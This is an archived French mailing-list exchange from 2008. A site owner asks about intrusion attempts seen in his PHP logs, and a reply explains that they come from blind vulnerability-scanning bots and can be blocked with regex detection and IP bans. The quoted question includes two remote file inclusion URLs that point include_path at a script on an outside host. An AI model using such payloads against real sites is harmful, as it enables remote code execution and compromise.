oui, ce sont des robots de recherche de failles, des requetes de ce
genre j'en ai des milliers chaque jour sur mes serveurs, au point que
generalement il y a plus de charge en provenance des robotsd qu'en
provenance des visiteurs reels.

 En general ces robots testent des failles connues pour un cms (
joomla, phpbb . .. . ) mais en aveugle, ils cherchent la faille sur
tous les sites du web sans chercher a savoir si le site web possede le
logiciel concerne par la faille.
 D'une maniere generale tu ne risque rien.si ton site web n'utilise
pas le logiciel concerne par la faille recherchée, le seul vrai risque
est pour l'hebergeur de ton site qui, s'il heberge des dizaines de
sites web sur un meme serveur, risque d'etre surcharge par des
dizaines de requetes de ce genre a la minute.
 Sur certains de mes serveurs j'ai du en arriver a creer des
expressions regulieres qui detectent dce genre de requetres bidon pour
ensuite dropper reguilierement les adresses ips utilisees par ces
robots, sans quoi ils generent tellement de charge sur le serveur que
les sites peuvent etre injoignables  pour les vrais utilisateurs.

Le 02/04/08, Yann Cochard<[EMAIL PROTECTED]> a écrit :
> Bonjour,
>
>  Sur mon site en PHP, je repère des tentatives d'intrusion / prise de
>  contrôle / récupération de données sensibles. Elles n'ont pas l'air
>  efficaces (c'est pour ça que j'en ai connaissance d'ailleurs : j'ai un
>  log d'erreur), et se font par massage de paramètres.
>  Exemple :
>  
> http://monsite/config_settings.php?config[include_path]=http://www.health-nutrition-business.com/echo.txt?
>  ou même :
>  
> http://monsite/mapage.html/config_settings.php?config[include_path]=http://www.health-nutrition-business.com/echo.txt?
>  Comme je n'ai pas de page config_settings.php et que mes pages ne
>  prennent pas les paramètres de cette manière, ça ne marche pas... o_O
>  Pour voir le contenu du script que l'attaquant essaie de faire
>  tourner, voyez ce fichier texte :
>  http://www.health-nutrition-business.com/echo.txt
>
>  La question que je me pose : ces attaques sont-elles conçus pour des
>  programmes PHP connus (par exemple phpBB), ou bien peuvent-elles
>  fonctionner sur du code maison ?
>  Comment s'en prémunir ?
>
>  Merci
>  Yann
>
> --
>  _________________________________________________________________
>  Kaella, distribution Linux live-cd : http://kaella.linux-azur.org
>
>  Diffusez cette liste aupres de vos relations :)
>      Linux Azur : http://linux-azur.org
>  L'auteur du post est responsable de ses écrits !
>  *** Pas de message SMS, HTML ni de PJ SVP ***
>


-- 
Cordialement

 William Waisse
  http://waisse.org | http://neoskills.com
   http://cahierspip.ww7.be | http://feeder.ww7.be

carte de visite : http://xena.ww7.be/my_carte2.jpg

Diffusez cette liste aupres de vos relations :)
     Linux Azur : http://linux-azur.org
L'auteur du post est responsable de ses �crits !
*** Pas de message SMS, HTML ni de PJ SVP ***

Répondre à